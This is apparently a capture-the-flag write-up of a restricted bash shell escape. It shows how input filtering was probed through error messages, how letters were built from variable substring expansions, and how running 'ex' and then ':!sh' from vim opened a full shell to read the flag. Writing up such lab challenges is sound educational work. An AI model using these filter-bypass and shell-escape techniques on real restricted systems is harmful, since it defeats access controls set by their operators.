Tags: bash jailbreak

Rating:

# Special (Pwn)

A classic restricted shell jailbreak task.
We can ssh to a server and we get access via some kind of restricted shell.
It's all blackbox, so we need to poke around a bit to figure out what we can and can't do.

We get only messages from stderr, which makes things a bit harder.
Sending some random payloads tells us that our commands are executed via bash -c "cmd".
There is also some input filtration applied.

We can send as command $PWD which shows error bash: /home/special: Is a directory. This is very useful, because we can send for example $PWDabcdefg.... and in the error log we get back the string without the filtrated characters.
From this we know that we can use {}|;:<>$'#^_+- and all uppercase letters. Next we proceed with testing bash special variables, and from this we get an interesting result for $_:


declare -x A="T"
declare -x AB="HI"
declare -x ABC="ISN"
declare -x ABCD="OTTH"
declare -x ABCDE="EFLAG"
declare -x ABCDEF="BUTMAY"
declare -x ABCDEFG="BEITCAN"
declare -x ABCDEFGH="HELPGETT"
declare -x ABCDEFGHI="INGFLAG:D"
declare -x OLDPWD
declare -x PWD="/home/special"
declare -x SHELL=""
declare -x SHLVL="1"
declare -x _="export"


Now what we want to do, is to create some meanigful command.
Sadly we don't have () so we can't do any calculations and therefore create numbers.
The intended solution was to use ${#variable_name} to get length of the variable, and thus get some numbers, but we didn't know that... What we can do is to use ${variable:K:N} which is a substring from index K with length N.
We have only $SHLVL which has value 1 and $# with value 0, and with those we can get:


slash -> ${PWD::$SHLVL}
h -> ${-::$SHLVL}
a -> ${PWD:$SHLVL$SHLVL:$SHLVL}
i -> ${PWD:$SHLVL$#:$SHLVL}
e -> ${_:$#:$SHLVL} x ->${_:$SHLVL:$SHLVL}


Again, the intended solution was to get s and h and spawn a shell, but we didn't have s.
Fortunately we figured out that we can run ex command, which spawns vim!

From vim we can simply run :!sh to spawn a shell, and read the flag: Flag{B4sh_subst1tut1on_is_gud!}

Original writeup (https://github.com/p4-team/ctf/tree/master/2018-03-24-securinets/pwn_special).